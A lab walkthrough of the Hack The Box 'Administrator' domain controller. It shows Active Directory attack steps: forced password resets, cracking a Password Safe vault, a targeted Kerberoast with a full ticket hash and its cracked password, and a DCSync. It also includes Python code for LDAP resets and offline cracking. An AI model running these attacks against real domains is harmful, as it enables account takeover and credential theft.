This is a Windows Server 2022 domain controller. Starting from the provided credentials we enumerate the domain with BloodHound CE and move laterally by abusing GenericAll and ForceChangePassword edges. Eventually we land in an account with access to an FTP server, where we find a Password Safe backup that, once cracked, yields credentials that allow collecting the user flag.
Escalation follows the same pattern. We keep moving laterally by enumerating with BloodHound CE and taking advantage of GenericWrite and GetChangesAll edges, abusing them through a targeted Kerberoast and a DCSync attack respectively, until we finally obtain the Administrator's NT hash.
KEYWORDS
BloodHound CE enumeration, GenericAll, ForceChangePassword, bloodyAD, net rpc, Password Safe, GenericWrite, targeted kerberoasting, GetChangesAll, DCSync attack.
REFERENCES
ENUMERATION
Port scan.
> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done
Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-25 19:01 GMT
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.053s latency).
Scanned at 2025-01-25 19:01:22 GMT for 66s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-01-26 02:06:35Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
63633/tcp open msrpc syn-ack Microsoft Windows RPC
63636/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
63645/tcp open msrpc syn-ack Microsoft Windows RPC
63652/tcp open msrpc syn-ack Microsoft Windows RPC
63655/tcp open msrpc syn-ack Microsoft Windows RPC
63668/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h05m07s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
| Check 2 (port 20522/tcp): CLEAN (Couldn't connect)
| Check 3 (port 52572/udp): CLEAN (Timeout)
| Check 4 (port 52617/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-01-26T02:07:27
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 66.53 seconds
List of open ports: 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,63633,63636,63645,63652,63655,63668
Looks like a domain controller (DNS, Kerberos, LDAP and the global catalog are all there). We have credentials for olivia:ichliebedich, so add administrator.htb to /etc/hosts and enumerate SMB.
> smbmap -H administrator.htb -P 445 -u olivia -p ichliebedich
[+] IP: administrator.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Nothing useful here. Use the same credentials to collect domain data for BloodHound CE and dump additional domain usernames.
In BloodHound CE we inspect the outbound edges from olivia@administrator.htb and notice she has GenericAll over michael@administrator.htb.
USER
We will start by moving laterally to michael. Having GenericAll over his account, there are two ways to do it.
The first option is net user. Notice olivia is a member of the Remote Management Users group, meaning we can open an Evil-WinRM session with her credentials.
Just open a shell and reset michael's password with net user. Keep in mind this is a reset, not a change: the old password is not needed, but michael will no longer be able to log in with it, so on a real engagement note the original state before touching the account.
> evil-winrm -i administrator.htb -u olivia -p ichliebedich
> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator alexander benjamin
emily emma ethan
Guest krbtgt michael
olivia
The command completed with one or more errors.
> net user michael password123
The command completed successfully.
A second option would be to use bloodyAD, as in Certified.
> python3 /home/kali/.local/bin/bloodyAD -d administrator.htb -u olivia -p ichliebedich --host 10.10.11.42 set password michael 'password123'
[+] Password changed successfully!
Whichever option we choose, we can now mark michael as "Owned" in BloodHound CE and continue enumerating from there.
As michael, it seems we have ForceChangePassword over benjamin.
Although we can open a WinRM shell as michael, in this case we cannot change benjamin's password with net user, since ForceChangePassword does not allow it.
However, we can still do it remotely with bloodyAD.
> python3 /home/kali/.local/bin/bloodyAD -d administrator.htb -u michael -p password123 --host 10.10.11.42 set password benjamin 'password123'
[+] Password changed successfully!
Or with net rpc
> net rpc password "benjamin" "password123" -U "administrator.htb"/"michael"%"password123" -S "administrator.htb"
Back in BloodHound CE, mark benjamin as "Owned" and start enumerating from there.
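Both resets above (GenericAll over michael, ForceChangePassword over benjamin) come down to the same LDAP operation that bloodyAD performs: a replace of the target's unicodePwd attribute over an encrypted channel. The following is an added example, not code from the original writeup or from bloodyAD; it assumes the ldap3 package is installed and that the DC exposes LDAPS on 636, and the host, account and password values in the usage block are placeholders.

```python
# Added example (not from the original writeup): the LDAP modify behind
# `bloodyAD set password`, i.e. replacing the target's unicodePwd attribute.
# Assumptions: ldap3 is installed, the DC speaks LDAPS on 636, and the
# host/user/password values used in __main__ are placeholders.
import ssl


def unicode_pwd(password: str) -> bytes:
    """AD only accepts a new unicodePwd value wrapped in double quotes and
    encoded as UTF-16-LE; sending plain UTF-8 is rejected with a constraint error."""
    return f'"{password}"'.encode("utf-16-le")


def base_dn(domain: str) -> str:
    """administrator.htb -> DC=administrator,DC=htb"""
    return ",".join(f"DC={part}" for part in domain.split("."))


def reset_password(dc_host: str, domain: str, user: str, password: str,
                   target: str, new_password: str):
    """Bind as `user` over LDAPS and reset `target`'s password.

    Works with either GenericAll or ForceChangePassword over the target, because
    replacing unicodePwd only needs the User-Force-Change-Password extended right.
    The DC refuses this modify over an unencrypted channel, hence LDAPS.
    Returns (ok, ldap_result_dict).
    """
    from ldap3 import ALL, MODIFY_REPLACE, NTLM, Connection, Server, Tls
    from ldap3.utils.conv import escape_filter_chars

    tls = Tls(validate=ssl.CERT_NONE)  # lab DC with a self-signed certificate
    server = Server(dc_host, port=636, use_ssl=True, tls=tls, get_info=ALL)
    conn = Connection(server, user=f"{domain}\\{user}", password=password,
                      authentication=NTLM, auto_bind=True)
    try:
        # Look the target up by sAMAccountName; escape it so a crafted name
        # cannot widen the filter.
        found = conn.search(base_dn(domain),
                            f"(sAMAccountName={escape_filter_chars(target)})",
                            attributes=["distinguishedName"])
        if not found:
            return False, {"description": f"{target} not found"}
        dn = conn.entries[0].entry_dn
        ok = conn.modify(dn, {"unicodePwd": [(MODIFY_REPLACE, [unicode_pwd(new_password)])]})
        return ok, dict(conn.result)
    finally:
        conn.unbind()


if __name__ == "__main__":
    ok, result = reset_password("10.10.11.42", "administrator.htb",
                                "michael", "password123", "benjamin", "password123")
    print("changed" if ok else "failed", result.get("description"))
```

If the modify comes back with an "unwilling to perform" or constraint error, the usual culprits are a plain-LDAP (389) connection, a missing quote/UTF-16 encoding, or a new password that violates the domain policy.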
He is a member of Share Moderators, which suggests he may have specific permissions on the SMB or FTP server.
Let's try enumerating SMB with benjamin's credentials.
> smbmap -H administrator.htb -P 445 -u benjamin -p password123
[+] IP: administrator.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Nothing useful here either. However, the same credentials work on the FTP server, and from there we can download the Backup.psafe3 file. The extension belongs to Password Safe, the open-source password manager, and its v3 database format can be attacked directly with hashcat module 5200.
> ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 3 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
952 bytes received in 0.04 secs (21.9634 kB/s)
ftp> exit
221 Goodbye.
Before cracking, note the "bare linefeeds received in ASCII mode" warning: for binary files it is safer to switch to binary mode (the ftp `binary` command) before `get`. Here the 952 bytes received match the size in the listing, so the file is intact and hashcat parses its header without complaint.
> hashcat -m 5200 -a 0 Backup.psafe3 /usr/share/wordlists/rockyou.txt
With this password we can open the vault in Password Safe and dump another three credentials, for alexander@administrator.htb, emily@administrator.htb and emma@administrator.htb.
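For reference, this is what hashcat mode 5200 computes against a .psafe3 file: the fixed header carries a salt, an iteration count and a SHA-256 of the stretched master key, so a candidate can be checked without touching the encrypted records. The block below is an added example, not the writeup's own code and not the Backup.psafe3 from the box; the sample header it builds is constructed on the spot with a made-up master password ("hunter2").

```python
# Added example (not part of the original writeup): the Password Safe v3
# master-password check that hashcat -m 5200 performs. The sample file bytes
# are constructed here with a made-up password; they are not Backup.psafe3.
import hashlib
import os
import struct
from typing import Iterable, Optional


def stretch_key(password: bytes, salt: bytes, iterations: int) -> bytes:
    """PWS3 key stretching: X0 = SHA256(pw || salt), Xi = SHA256(X(i-1)), P' = Xn."""
    x = hashlib.sha256(password + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def parse_psafe3_header(data: bytes) -> dict:
    """Read TAG, SALT, ITER and H(P') from the fixed 72-byte PWS3 header."""
    if len(data) < 72 or data[:4] != b"PWS3":
        raise ValueError("not a Password Safe v3 file")
    salt = data[4:36]
    (iterations,) = struct.unpack("<I", data[36:40])
    hp = data[40:72]
    return {"salt": salt, "iterations": iterations, "hp": hp}


def check_master_password(header: dict, candidate: str) -> bool:
    """SHA256(stretch(candidate)) must equal the stored H(P')."""
    p_prime = stretch_key(candidate.encode(), header["salt"], header["iterations"])
    return hashlib.sha256(p_prime).digest() == header["hp"]


def crack(header: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack; ITER (2048 by default) is the only real cost per candidate."""
    for word in wordlist:
        if check_master_password(header, word):
            return word
    return None


def make_sample_psafe3(master: str, iterations: int = 2048) -> bytes:
    """Constructed test vector: a minimal PWS3 header protected by `master`."""
    salt = os.urandom(32)
    hp = hashlib.sha256(stretch_key(master.encode(), salt, iterations)).digest()
    return b"PWS3" + salt + struct.pack("<I", iterations) + hp


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else make_sample_psafe3("hunter2")
    hdr = parse_psafe3_header(data)
    print(f"ITER={hdr['iterations']} salt={hdr['salt'].hex()[:16]}...")
    print("master password:", crack(hdr, ["123456", "password", "hunter2"]))
```

Pass a real .psafe3 path as the first argument to check it against your own wordlist; a low ITER value in the header is itself a finding, since it is the only thing slowing an offline attack down.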
After a quick BloodHound CE enumeration of the three users, we see only emily@administrator.htb belongs to Remote Management Users.
Just use her credentials to open a WinRM session and collect the user flag.
SYSTEM
Start from the emily shell and take the opportunity to enumerate the system.
> Get-ComputerInfo
WindowsBuildLabEx : 20348.1.amd64fre.fe_release.210507-1500
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 10/4/2024 5:07:44 PM
WindowsProductId : 00454-20165-01481-AA452
WindowsProductName : Windows Server 2022 Standard
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 2009
OSDisplayVersion : 21H2
Enumerating the emily account in BloodHound CE, she has GenericWrite over ethan.
BloodHound suggests either a targeted Kerberoast or a shadow credentials attack.
We can try shadow credentials with Certipy first, as we did in Week 1. EscapeTwo; however, it fails here: the DC resets the LDAPS connection Certipy needs.
> sudo ntpdate 10.10.11.42 && certipy shadow auto -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb -dc-ip 10.10.11.42 -ns 10.10.11.42 -account ethan
[sudo] password for kali:
2025-01-26 21:44:05.372045 (+0000) +25230.779009 +/- 0.020212 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25230.779009
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got error: socket ssl wrapping error: [Errno 104] Connection reset by peer
[-] Use -debug to print a stacktrace
So let's try a targeted Kerberoast. In a nutshell, we write a Service Principal Name onto the target account, for which we have GenericWrite, turning it into a service account from the KDC's point of view. Then we request a Service Ticket (ST) for that SPN; its encrypted part is protected with a key derived from ethan's password, so we can crack it offline with hashcat module 13100. We use targetedKerberoast.py, the tool suggested by BloodHound CE: it logs in with the provided credentials, enumerates the users whose SPN can be overwritten, sets a temporary SPN, requests the ST, and finally clears the SPN so the account is left in its original state. Note the rdate call in front of the command: nmap reported a clock skew of about seven hours, and Kerberos rejects requests more than five minutes off the KDC's time.
> sudo rdate -n 10.10.11.42 && python3 /opt/kerberoast/targetedkerberoast.py -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb -d administrator.htb --dc-ip 10.10.11.42
Sun Jan 26 22:04:36 GMT 2025
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$15ec7606ffa3297b86b280475f514f9c$2e4d87fb991fa421183d34d1f57dc6eff6cf90d47f165e99e8caa4042a91278d9ae1897d9b5bd1c4938ae952b02b253b63207405bb7f66b8509c614b4e8a0fe9bff6e4ae67a8c6df5ce80d08d1e2f0cc78389f94289f4fe121f402cf1d8a411db8e49116ae92534989d03f740899d01f2f264273ad4da38a5537fde4c4d629961839c4a7916a3f246240ce1e50602d648a17d05384131d1729c9debfe576e9a37bf347899896e9df8bec3b2ac16110da971e0142ef5435bb73ee2fca6baf923ad26540ff42b735d73ff730cdb075026d0646247db541b3c824a2c8fef6c72572d06c64f341778b0456cbf6376f22bc444228cc4fef86c8bb62093c7081daf6ab75c809508c2ca0ab0fe679e1dbbd753441316d58d1245fdcd9e1b8ef58faa2c71ae319296eeda923da7a42677e65a7ab048b694ea8f880bb021740f94eb4f9b1416d37cd75f41c2b9d045370890611857ae2576e117c1ca52de93918d7104e95c95cd130b2d06805d6c99d5c13b61ab0040f02117accc14a8ad06e2f6d66103c07e9e96a6a2a94f4a12e34e9c3f8b46a305e778a17958128465967076c0365d7c87bb6c517d8ab27d1a89f582a72e303bf0ac54c1c7d2fbe80b2500cab320cdbac803fdfa2c8a54e8db9870a5dd73193a85878752373da71d223e8cdd47dcd2ba3c3b353bc5f1af493da902c90b5a26a218aa6875ff9ffa5bc8bc2f1f90d65502819f01f3c8539950c1d905b2bd803145cfd603a6d75a654ce2c83210b59ed9e6c232841a7d6f5e706072e8e9ed38baaf4c04640841726e61a7f484e900ef1515480ba9b337f80c9cc9d0f974aff33b83897d340a925ab084d60914f708eb5cb917c91ecb362b490f2da965fc476956c7f2d9968ed61b10bdacd2c371955253ebbddfbfc97ee2b38badec0413bca0ec1e11aa44429c6d3d9ab73aaa4a1425fbf23123260c42ed28229e3b766ed0c5682eb6b097b315f72b8ce387978525b3800229f5a0980de2b1f947168c6956d06c8ad9178aefd34addba5e3c9f719619aa29301579cd426415ae8c9d832a93ce3beccf70b58340e949b12e9e6d9d7ef80a3b5852f0e372ba786237cb3f6b2a2738a3b70fd070f5ecd59e5cab52cb145113fc0f4832ba7adc297d6a01167773f9a9a3a5302a0c6a672b1437372d349752350778db5dcdb5f986a7b3110d2584d12a21d32960c061d0f5a60f182257b8954fcd13936b14ef1c6cd5396b2d3549971d83ef116fe4e65916c73f7d231e1c7c99bd82854b152c016f663ecc4c962a30dce3569f088398f8d230996901bfa72f3427ede4d73d1f7b8828fe098c958867c3bd9017002c3e74fbe7
3650d05228039b57c916ae017e89859afb79c9fb951c815476495819840ae9468fdb66d6ee687de54fed4724c77eee4bd4f9b4995005f644e2b1a58f87deb91088ec9e318fe9d1f6b34a33f6e2e001c2a0e3c0d7f463376a5e3827fadf2a88d6f79d73188b207e06b3207700a5929dd3b6d7fe47bb71402d1881a49a990f0472d912937b66825
Now crack the ST with module 13100 (Kerberos 5, etype 23, TGS-REP). The $krb5tgs$23$ prefix confirms the ticket was encrypted with RC4-HMAC, the fast-to-crack case; an etype 17 or 18 (AES) ticket would need modes 19600/19700 instead.
> hashcat -m 13100 -a 0 -d 1 hash.txt .\rockyou.txt
OpenCL API (OpenCL 3.0 CUDA 11.4.264) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: NVIDIA GeForce GTX 980M, 8000/8192 MB (2048 MB allocatable), 12MCU
OpenCL API (OpenCL 1.2 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) HD Graphics 4000, skipped
* Device #3: Intel(R) Core(TM) i7-3740QM CPU @ 2.70GHz, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 105 MB
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$15ec7606ffa3297b86b280475f514f9c$2e4d87fb991fa421183d34d1f57dc6eff6cf9
0d47f165e99e8caa4042a91278d9ae1897d9b5bd1c4938ae952b02b253b63207405bb7f66b8509c614b4e8a0fe9bff6e4ae67a8c6df5ce80d08d1e2f0cc78389f942
89f4fe121f402cf1d8a411db8e49116ae92534989d03f740899d01f2f264273ad4da38a5537fde4c4d629961839c4a7916a3f246240ce1e50602d648a17d05384131
d1729c9debfe576e9a37bf347899896e9df8bec3b2ac16110da971e0142ef5435bb73ee2fca6baf923ad26540ff42b735d73ff730cdb075026d0646247db541b3c82
4a2c8fef6c72572d06c64f341778b0456cbf6376f22bc444228cc4fef86c8bb62093c7081daf6ab75c809508c2ca0ab0fe679e1dbbd753441316d58d1245fdcd9e1b
8ef58faa2c71ae319296eeda923da7a42677e65a7ab048b694ea8f880bb021740f94eb4f9b1416d37cd75f41c2b9d045370890611857ae2576e117c1ca52de93918d
7104e95c95cd130b2d06805d6c99d5c13b61ab0040f02117accc14a8ad06e2f6d66103c07e9e96a6a2a94f4a12e34e9c3f8b46a305e778a17958128465967076c036
5d7c87bb6c517d8ab27d1a89f582a72e303bf0ac54c1c7d2fbe80b2500cab320cdbac803fdfa2c8a54e8db9870a5dd73193a85878752373da71d223e8cdd47dcd2ba
3c3b353bc5f1af493da902c90b5a26a218aa6875ff9ffa5bc8bc2f1f90d65502819f01f3c8539950c1d905b2bd803145cfd603a6d75a654ce2c83210b59ed9e6c232
841a7d6f5e706072e8e9ed38baaf4c04640841726e61a7f484e900ef1515480ba9b337f80c9cc9d0f974aff33b83897d340a925ab084d60914f708eb5cb917c91ecb
362b490f2da965fc476956c7f2d9968ed61b10bdacd2c371955253ebbddfbfc97ee2b38badec0413bca0ec1e11aa44429c6d3d9ab73aaa4a1425fbf23123260c42ed
28229e3b766ed0c5682eb6b097b315f72b8ce387978525b3800229f5a0980de2b1f947168c6956d06c8ad9178aefd34addba5e3c9f719619aa29301579cd426415ae
8c9d832a93ce3beccf70b58340e949b12e9e6d9d7ef80a3b5852f0e372ba786237cb3f6b2a2738a3b70fd070f5ecd59e5cab52cb145113fc0f4832ba7adc297d6a01
167773f9a9a3a5302a0c6a672b1437372d349752350778db5dcdb5f986a7b3110d2584d12a21d32960c061d0f5a60f182257b8954fcd13936b14ef1c6cd5396b2d35
49971d83ef116fe4e65916c73f7d231e1c7c99bd82854b152c016f663ecc4c962a30dce3569f088398f8d230996901bfa72f3427ede4d73d1f7b8828fe098c958867
c3bd9017002c3e74fbe73650d05228039b57c916ae017e89859afb79c9fb951c815476495819840ae9468fdb66d6ee687de54fed4724c77eee4bd4f9b4995005f644
e2b1a58f87deb91088ec9e318fe9d1f6b34a33f6e2e001c2a0e3c0d7f463376a5e3827fadf2a88d6f79d73188b207e06b3207700a5929dd3b6d7fe47bb71402d1881
a49a990f0472d912937b66825:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator....b66825
Time.Started.....: Sun Jan 26 16:08:51 2025 (1 sec)
Time.Estimated...: Sun Jan 26 16:08:52 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 16938.7 kH/s (7.64ms) @ Accel:512 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 196608/14344384 (1.37%)
Rejected.........: 0/196608 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> piggy!
Hardware.Mon.#1..: Temp: 41c Util: 5% Core:1037MHz Mem:2505MHz Bus:16
Started: Sun Jan 26 16:08:49 2025
Stopped: Sun Jan 26 16:08:52 2025
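What the 13100 kernel does with a $krb5tgs$23$ hash is small enough to write out: derive the NT hash of each candidate, derive the RC4-HMAC keys for key usage 2 (the ticket's encrypted part), decrypt, and compare the HMAC-MD5 checksum. The following is an added example and not the writeup's code, nor hashcat's or targetedKerberoast's; the sample ticket it verifies is forged locally with a made-up SPN and realm so it runs offline (the real ticket from the box is not reused). It also accepts a hash that has been line-wrapped by the terminal, which is exactly how the one above appears on the page.

```python
# Added example (not from the original writeup): a pure-Python check of what
# hashcat -m 13100 does with a $krb5tgs$23$ hash. The sample hash built in
# forge_sample_hash() is constructed here with made-up names; the box's ticket
# is not reproduced.
import hmac
import os
import struct
from hashlib import md5
from typing import Iterable, Optional

MASK = 0xFFFFFFFF
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}  # RC4-HMAC, AES128, AES256 TGS-REP


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320), inlined because hashlib lacks it on some OpenSSL 3 builds."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):  # rotate roles: (a,b,c,d) -> (d,a',b,c)
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def parse_krb5tgs(text: str) -> dict:
    """Parse `$krb5tgs$23$*user$REALM$spn*$checksum$edata2`; whitespace and line
    breaks from copy/paste are discarded first."""
    h = "".join(text.split())
    parts = h.split("$")
    if len(parts) < 6 or parts[1] != "krb5tgs":
        raise ValueError("not a $krb5tgs$ hash")
    etype = int(parts[2])
    if etype != 23:
        raise ValueError(f"etype {etype}: not RC4, use hashcat mode {HASHCAT_MODE.get(etype)}")
    user, realm, spn = h[h.index("*") + 1:h.index("*$")].split("$", 2)
    checksum_hex, edata_hex = h[h.index("*$") + 2:].split("$")
    return {"etype": etype, "user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum_hex), "edata2": bytes.fromhex(edata_hex)}


def check_candidate(parsed: dict, password: str) -> bool:
    """RFC 4757 RC4-HMAC decryption of the ticket enc-part (key usage 2):
    K1 = HMAC(K, usage), K3 = HMAC(K1, checksum), plaintext = RC4(K3, edata2),
    and the candidate is right iff HMAC(K1, plaintext) equals the stored checksum."""
    k1 = hmac.new(nt_hash(password), struct.pack("<I", 2), md5).digest()
    k3 = hmac.new(k1, parsed["checksum"], md5).digest()
    plaintext = rc4(k3, parsed["edata2"])
    return hmac.compare_digest(hmac.new(k1, plaintext, md5).digest(), parsed["checksum"])


def crack(parsed: dict, wordlist: Iterable[str]) -> Optional[str]:
    return next((w for w in wordlist if check_candidate(parsed, w)), None)


def forge_sample_hash(password: str, user: str = "svc", realm: str = "EXAMPLE.LOCAL",
                      spn: str = "HTTP/web.example.local") -> str:
    """Constructed test vector: encrypt a fake ticket body (ASN.1-looking prefix plus
    zeros) with the candidate's NT hash so it parses and cracks like a real hash."""
    k1 = hmac.new(nt_hash(password), struct.pack("<I", 2), md5).digest()
    data = os.urandom(8) + b"\x63\x82" + b"\x00" * 30  # 8-byte confounder || enc-part
    checksum = hmac.new(k1, data, md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${rc4(k3, data).hex()}"


if __name__ == "__main__":
    sample = forge_sample_hash("limpbizkit")  # same password the box used, fake ticket
    parsed = parse_krb5tgs(sample)
    print(parsed["user"], parsed["realm"], parsed["spn"], "mode", HASHCAT_MODE[parsed["etype"]])
    print("cracked:", crack(parsed, ["123456", "password", "limpbizkit"]))
```

On a real engagement the same parser is a quick sanity check before burning GPU time: an etype 17/18 ticket means the account (or the domain) enforces AES, and a wrong mode will simply report "no hashes loaded".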
Back again in BloodHound CE, we see ethan has GetChangesAll over the domain administrator.htb (together with GetChanges, the second replication right DCSync requires on the domain object), which essentially allows a DCSync with Impacket's secretsdump.py.
The only thing left is to use the Administrator's NT hash to open a shell, passing the hash instead of a password.
You are root.